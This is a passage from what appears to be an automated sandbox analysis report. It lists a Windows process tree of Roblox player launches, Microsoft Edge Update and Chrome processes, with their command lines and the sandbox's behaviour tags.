                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InswNzcwMzIyOS01ODY5LTQ3NzUtQjJCMS1DMzNDMTgwQjU5RjJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMTcxLjM5IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTAwNTQxNjQwIiBpbnN0YWxsX3RpbWVfbXM9IjgxNSIvPjwvYXBwPjwvcmVxdWVzdD4
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks system information in the registry
                                                                                              PID:1400
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{25D76038-9631-41B7-9864-2A11D77D3FBF}" /silent
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:2832
                                                                                        • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe
                                                                                          "C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe" -app -isInstallerLaunch
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of UnmapMainImage
                                                                                          PID:596
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8
                                                                                        2⤵
                                                                                          PID:1124
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:2
                                                                                          2⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:3932
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                                                          2⤵
                                                                                            PID:3004
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5188 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1
                                                                                            2⤵
                                                                                              PID:3804
                                                                                          • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                            1⤵
                                                                                              PID:1052
                                                                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks system information in the registry
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:2780
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InszOUQwQ0M1OS00OTVBLTQ1MDctOEIwMS0zMTZEMzIyQTU4QjB9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBuZXh0dmVyc2lvbj0iMTA2LjAuNTI0OS4xMTkiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIzIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTA1NTIxNTM4Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks system information in the registry
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1740
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:872
                                                                                                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:2272
                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=126.0.2592.68 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ff78bb9aa40,0x7ff78bb9aa4c,0x7ff78bb9aa58
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4720
                                                                                              • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InsxRjJDNUI0RS1BNzM1LTQxQzgtOEQwMy03NkZCNDE0OThGMDl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEyNi4wLjI1OTIuNjgiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjY1NDAzMzE2MzkiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTQwNDIxODA0IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzI4MjAxMzY0NCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmYudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvYWM2ZjYxMWItZWViNy00YTQyLWE2ZDQtOGNkNzE0Mjk2YTExP1AxPTE3MjAwNDk4NTImYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9bU1SQThtWG9oNTBlbmdoMEN0YnhHN29tRFJlb3JYUHNvMjN4ajNHT0Y5SVl1JTJmTTdpQU90bnFzeWRhcjlLSDF6Qk9RREVSMEFsZE1QQVExdWZoWWt6ZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3Mjk1NzI0MCIgdG90YWw9IjE3Mjk1NzI0MCIgZG93bmxvYWRfdGltZV9tcz0iNzAyMzEiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MjgyMDkzNDkyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzI5NTY1Mzc5MiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzcwMDg3ODQyNiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjgzOSIgZG93bmxvYWRfdGltZV9tcz0iNzQxNjQiIGRvd25sb2FkZWQ9IjE3Mjk1NzI0MCIgdG90YWw9IjE3Mjk1NzI0MCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNDA1MTkiLz48L2FwcD48L3JlcXVlc3Q-
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks system information in the registry
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1316
                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                              "C:\Windows\system32\taskmgr.exe" /0
                                                                                              1⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Checks processor information in registry
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:580
                                                                                            • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe
                                                                                              "C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious use of UnmapMainImage
                                                                                              PID:592
                                                                                            • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe
                                                                                              "C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious use of UnmapMainImage
                                                                                              PID:4844
                                                                                            • C:\Windows\system32\SystemPropertiesRemote.exe
                                                                                              "C:\Windows\system32\SystemPropertiesRemote.exe"
                                                                                              1⤵
                                                                                                PID:1732
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe"
                                                                                                1⤵
                                                                                                  PID:2052
                                                                                                • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:4756
                                                                                                • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks system information in the registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2464
                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1512
                                                                                                    • C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"
                                                                                                      3⤵
                                                                                                      • Event Triggered Execution: Image File Execution Options Injection
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks system information in the registry
                                                                                                      PID:3776
                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4424
                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Modifies registry class
                                                                                                        PID:520
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          PID:1308
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          PID:3120
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          PID:872
                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuNDEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjgxRDhBM0MtMTg0Qy00ODgzLThDN0QtNTVBQTM0ODdGMUVDfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7QTQ0OURFMTAtNTAyNC00MEQxLUI2MEYtN0E3RjUxMzQ1REQ1fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlFFTVUiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTcxLjM5IiBuZXh0dmVyc2lvbj0iMS4zLjE4Ny40MSIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjAiIGluc3RhbGxkYXRlPSI2Mzg0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MTk0NDUwNDciPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwMTA1Mzg4Mzg3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks system information in the registry
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3524
                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjgxRDhBM0MtMTg0Qy00ODgzLThDN0QtNTVBQTM0ODdGMUVDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntFMTQxMzIwQi1CMDNGLTRGRjEtQUE5MS00OUFENzMzQjIxMzF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzEuMzkiIG5leHR2ZXJzaW9uPSIxLjMuMTg3LjQxIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjAiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijk2NDI1NzUxMzEiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iOTY0MjY2NTAwMSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1